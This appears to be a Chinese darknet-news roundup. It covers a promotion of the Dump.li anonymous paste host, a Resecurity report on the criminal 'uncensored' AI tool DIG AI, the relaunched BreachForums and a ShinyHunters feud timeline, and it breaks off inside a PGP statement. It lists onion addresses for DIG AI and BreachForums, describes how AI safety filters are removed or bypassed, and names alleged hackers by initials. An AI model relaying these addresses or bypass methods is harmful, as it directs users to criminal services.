Dump[.]li的主要特点 完全匿名:不需要注册、不需要登录、不收集任何个人信息可在暗网访问,不容易被追踪; 不依赖Javascript:整个网站不依赖JS,前后端都非常轻量,加载速度快; 分享时间:可以设置分享时间,从5分钟、1小时、1天、1周、1个月、1年不等,也可以设置永不过期; 图床服务:支持一次最多上传30张图片,每张图片最大20MB,图片支持格式包括“image/jpeg,image/png,image/gif,image/webp”; 去除元数据:支持删除图片的EXIF元数据,最大层度保护用户隐私; 相册功能:可以创建多个相册(图片合集),之后还能凭名称+密钥继续增删图片; 文本分享:可以当作极简pastebin使用,分享文本文件,适合快速分享带格式的文本或笔记,并支持markdown格式。 Dump[.]li的明网及暗网网址 明网网址:https://dump.li
暗网v3网址:https://dumpliwoard5qsrrsroni7bdiishealhky4snigbzfmzcquwo3kml4id.onion
i2p网址:http://dumplinf6axdc6zeingl27du2jvdvdpfch34jagvqhtqezvjqzzq.b32.i2p
Resecurity最新研究发现,未经审查的暗网人工智能助手正在兴起,使威胁行为者能够利用其先进的数据处理能力进行恶意活动。其中一款名为DIG AI的工具于今年9月29日被发现,并已在网络犯罪分子和有组织犯罪圈子中迅速传播,获得网络犯罪分子的青睐——安全研究人员警告说,这可能会显著加速2026年的非法活动。
该工具名为DIG AI,它允许威胁行为者以极低的技术水平生成恶意软件、诈骗和非法内容,凸显了人工智能是如何被武器化并突破传统安全措施的。2025年第四季度,Resecurity的HUNTER团队观察到,恶意行为者使用DIG AI的数量显著增加,并在冬季假期期间加速增长,当时全球非法活动创下新纪录。
Resecurity的研究人员表示,随着2026年米兰冬奥会和FIFA世界杯等重要赛事的举办,人工智能“将带来新的威胁和安全挑战,使不法分子能够扩大其行动规模并绕过内容保护策略”。
服务犯罪的人工智能的崛起 DIG AI代表了一类新型的“不良”(“犯罪”或“未经审查”)人工智能工具,专门用于绕过ChatGPT、Claude和Gemini等主流平台中嵌入的内容审核和安全控制。其合法性和伦理性取决于工具本身、使用方式和使用者,以及可能对社会造成危害的技术的开发者。
它的迅速普及凸显了现代人工智能可以多么迅速地被重新利用,以扩大网络犯罪、欺诈和极端主义活动的规模——通常比防御者适应的速度还要快。
网络犯罪论坛上提及和使用恶意人工智能工具的次数显著增加(2024-2025年增幅超过200%),表明这些技术正在迅速普及和发展。“暗网下/AWX”多次报道,FraudGPT和WormGPT是目前最知名的专门面向网络犯罪分子的AI工具,但随着新的越狱和定制版LLM工具不断涌现,网络犯罪领域正在快速演变。这些工具通过自动化和增强恶意活动,降低了网络犯罪的门槛。
这些工具通常被称为“暗黑 LLM”(大型语言模型)或“越狱”AI 聊天机器人,它们要么是从零开始构建的,要么是合法 AI 模型的修改版本,移除了其安全限制。
DIG AI使恶意行为者能够利用人工智能生成各种线索,从制造爆炸装置到制作包括儿童性虐待材料在内的非法内容,无所不能。由于DIG AI托管在TOR网络上,执法部门难以发现和访问此类工具。它们催生了一个庞大的地下市场——涵盖盗版、衍生品以及其他非法活动。
尽管如此,也有一些重要的倡议,例如国际电信联盟(ITU)和联合国数字技术机构于2017年共同发起的“人工智能向善”(AI for Good)项目,旨在促进新技术的负责任使用。然而,不法分子则会把重点放在完全相反的事情上——将人工智能武器化和滥用。
一款专为犯罪而打造的暗网人工智能DIG AI 与合法的AI平台不同,DIG AI不需要用户注册,只需点击几下即可通过Tor浏览器访问。DIG AI的暗网V3地址为:
https://digdig2nugjpszzmqe5ep2bk7lqfpdlyrkojsx2j6kzalnrqtwedr3id[.]onion
研究人员证实,DIG AI可以生成功能性恶意脚本,能够为易受攻击的Web应用程序以及其他类型的恶意软件中植入后门,并自动执行诈骗活动。
根据Resecurity的测试,除了网络犯罪之外,该工具可以生成涵盖各种非法领域的各种内容,包括欺诈计划、恶意软件开发、毒品制造说明和极端主义宣传。Resecurity的分析师利用与爆炸物、毒品、违禁物质、欺诈和其他受国际法律限制的领域相关的分类词典,对DIG AI进行了多次测试。
当与外部API结合使用时,该平台能够让不法分子高效地扩展其行动规模——在降低成本的同时提高产量。
虽然由于计算资源有限,一些资源密集型任务(例如代码混淆)可能需要几分钟才能完成,但分析人士指出,攻击者可以通过付费高级服务层级轻松解决这些限制。这开启了“不良人工智能”的新领域——恶意行为者设计、运营和维护定制的基础设施,甚至是类似于用于防弹托管的数据中心,但其目的是为了让犯罪人工智能能够有效地扩展其运行规模,同时考虑负载、并发请求以及多个用户同时使用的情况。
DIG AI背后的运营者,化名“Pitch”,在暗网论坛Dread上发帖推广该服务,声称该服务基于ChatGPT Turbo构建,并移除了所有安全限制。
在暗网里,该工具的广告横幅出现在与毒品贩运和被盗支付数据相关的地下市场主页上,凸显了它对有组织犯罪网络的吸引力。
犯罪人工智能如何助长儿童性虐待 其中最令人担忧的发现之一是DIG AI在促进AI生成的儿童性虐待材料(CSAM)方面可能发挥的作用。
生成式人工智能技术——例如扩散模型、生成对抗网络(GAN)和文本转图像系统——正被积极滥用,能够生成高度逼真、露骨的儿童图像或视频——既可以通过生成完全合成的内容,也可以通过篡改真实未成年人的正常图像来实现。这将给立法者在打击 CSAM 内容的制作和传播方面带来新的挑战。
Resecurity证实,DIG AI可以协助生成或操纵涉及未成年人的露骨内容。Resecurity表示其团队与相关执法部门合作,收集并保存了不良行为者使用DIG AI制作高度逼真的CSAM内容的证据——有时被贴上“合成”的标签,但实际上被解释为非法。
全球执法机构已经报告称,人工智能生成的儿童性虐待材料案件急剧增加,其中包括涉及篡改真实儿童图像和用于敲诈勒索或骚扰的合成内容的事件。
近年来,包括欧盟、英国和澳大利亚在内的多个司法管辖区都颁布了法律,明确将人工智能生成的儿童性虐待材料定为犯罪行为,无论其中是否描绘了真实的未成年人。然而,当工具匿名托管在暗网上时,执法仍然很困难。
暗网里的人工智能没有任何限制与审查 主流人工智能,如OpenAI的ChatGPT、Anthropic的Claude、Google Gemini/Bard、Microsoft Copilot和Meta AI等平台都采用了内容审核系统。这些系统会审查或限制仇恨言论、虚假信息、色情内容、暴力、非法活动以及(在某些司法管辖区)政治言论等类别的内容。审查的主要原因是遵守法律(例如欧盟人工智能法案)、保护用户免受伤害、维护道德标准以及保障公司声誉和市场准入。
然而,这些保障措施对于像DIG AI这样的暗网托管服务来说,大多无效,因为这些服务在传统的法律和管辖范围之外运作。
犯罪分子越来越多地对开源模型进行微调,移除安全过滤器,并使用受污染的数据集训练系统,以按需生成非法输出。这催生了一种以“人工智能即服务”为核心的新兴地下经济,这种经济模式模仿了合法的商业模式,但社会风险却高得多。
降低人工智能威胁带来的风险 以下步骤概述了网络安全团队可以采取的切实可行的措施,以提高抵御人工智能攻击的能力。
加强对电子邮件、网络、身份和API攻击面上的AI辅助网络钓鱼、欺诈、恶意软件和自动化滥用行为的检测和监控。 扩大威胁情报计划,使其涵盖暗网市场、犯罪人工智能工具、品牌滥用以及人工智能定向攻击的早期迹象。 通过网络分段与主动保护面向公众的资产来减少攻击面,通过强制执行防钓鱼的多因素身份验证(MFA)、最小权限访问、持续身份验证和零信任原则来加强身份和访问控制。 通过将人工智能攻击场景纳入网络安全防护演练,培训员工和高风险团队识别人工智能生成的诱饵、深度伪造冒充以及用于欺诈和社会工程攻击的合成媒体,提高事件应急响应能力。 这些措施共同帮助各企业加强安全态势,应对人工智能威胁带来的风险。
人工智能带来新的安全挑战 不法分子已经通过精心设计的提示或对抗性后缀滥用人工智能系统,绕过内置的安全协议,导致模型生成违禁内容。DreamBooth和LoRa等工具使犯罪分子能够利用开源的低级模型(LLM)生成针对特定目标的儿童性虐待材料(CSAM)。这个问题也为犯罪分子创造了新的商业模式,使他们能够优化成本,并大规模地利用合成的非法内容发展地下经济。
Resecurity预测,不法分子将积极操纵数据集,例如受污染的训练数据(如LAION-5B,其中可能包含儿童性虐待材料或良性内容与成人内容的混合),从而使模型能够学习并复制非法输出。犯罪分子可以在自己的基础设施上运行模型,或将其托管在暗网上,从而生成在线平台无法检测到的无限非法内容。他们还可以允许他人访问相同的服务,以创建自己的非法内容。开源模型尤其脆弱,因为安全过滤器可以被移除或绕过。这些模型正在被微调和破解,以生成非法内容。
DIG AI并非孤立的发展,而是武器化人工智能如何开始重塑更广泛的威胁格局的早期迹象。随着犯罪分子和极端分子采用自主人工智能系统,安全团队必须应对规模、速度和效率远超传统人为攻击的威胁。
几天前,“暗网下/AWX”报道了新的暗网论坛BreachForums再次出现,且无法确定其背后是什么人在运营,当时据称“由于持续的技术问题和大规模DDoS攻击”,该论坛仅可访问,但无法登录。目前,该论坛已经可以在明网正常登录发贴,但暗网地址依旧无法访问。
此外,威胁行为者之间的战争仍在持续。闪光猎手组织在shinyhunte[.]rs网站上发布了更多人肉线索与内幕,为警方打击提供了更多的便利。
新BreachForums再次恢复了访问 正如前期介绍,新的BreachForums使用之前公开泄露的BreachForums备份进行搭建,因此前期的BreachForums用户均无需注册即可访问。
在技术问题和大规模DDoS攻击问题解决之后,新的BreachForums再次开放访问,该论坛目前添加了DDOS-GUARD来防护DDoS攻击,在明网访问的速度还不错。
虽然许多传言显示新BreachForums是蜜罐,但由于缺少有力的竞争对手,该论坛依旧收获了大量粉丝。从论坛的在线状态看,一小时在线用户1000人,注册用户占1/5,在没有大规模推广的背景下,已经收获了相当大的人气。
上次已经介绍,新的BreachForums发布的明网与暗网地址如下(仅供网络安全研究人员与警方调查研究使用):
明网地址:breachforums[.]bf
暗网地址:http://breachedmw4otc2lhx7nqe4wyxfhpvy32ooz26opvqkmmrbg73c7ooad[.]onion
威胁行为者之间的内讧刚刚开始 上次已经介绍,在新BreachForums背后,至少有两波人在交战:一方自称是闪光猎人(ShinyHunters),另一方则是散落的拉普斯猎人(Scattered Lapsus$ Hunters,简称SLSH)。
黑客团伙ShinyHunters与勒索软件团伙Scattered LAPSUS$ Hunters(简称SLSH)的内部冲突正在升级,一方宣称可以向联邦调查局、BL2C、国际刑警组织免费提供另一方的犯罪线索。根据对shinyhunte[.]rs网站更新内容的整理,时间线如下:
2025年10月16日:网站发布消息,直接威胁名为“James”的法国人(疑似代号S.E./X*K)。消息声称真正的ShinyHunters正在完成FBI未竟的事业,语气敌对,这是威胁行为者之间首次公开升级。
2025年10月21日:发布一封信件风格的消息,针对“James”,警告他选择的道路带来的后果比想象中更严重,断绝后路绝非明智之举。引用拉丁语短语“sic transit gloria mundi”(世间荣华转瞬即逝),并警告每一步行动都将引发远超预期的连锁反应。
2025年12月14日:否认与#SLSH(Scattered LAPSUS$ Hunters)联盟的传闻。同时链接BreachForums重启(可能试图为疑似蜜罐操作正名)。威胁如果James不回应,将在24小时内公开曝光其信息。
2025年12月18日:发布详细的PGP签名声明,附带倒计时器和逮捕照片(涉及Yuro,即A.E.,以及Trihash,即R.L.)。指控法国人“James”通过滥用信任窃取Trihash的PGP密钥,并未经其他成员同意便实施了针对Salesforce的攻击行动。声明称,归咎于ShinyHunters与SLSH的勒索事件,主要由S.E.(别名X*K,亦使用化名“James”)策划实施,他已不再是ShinyHunters(SH)成员。
—–BEGIN PGP SIGNED MESSAGE—–
Hash: SHA256
Statement Regarding the Shiny Hunters and Scattered Spider Groups
The Shiny Hunters group includes several members, one of whom goes by the name “James.” Following the arrests of Yuro (A.E.) and, more recently, Trihash (R.L.), this individual has been attempting to divert investigators’ attention by leading them toward false trails.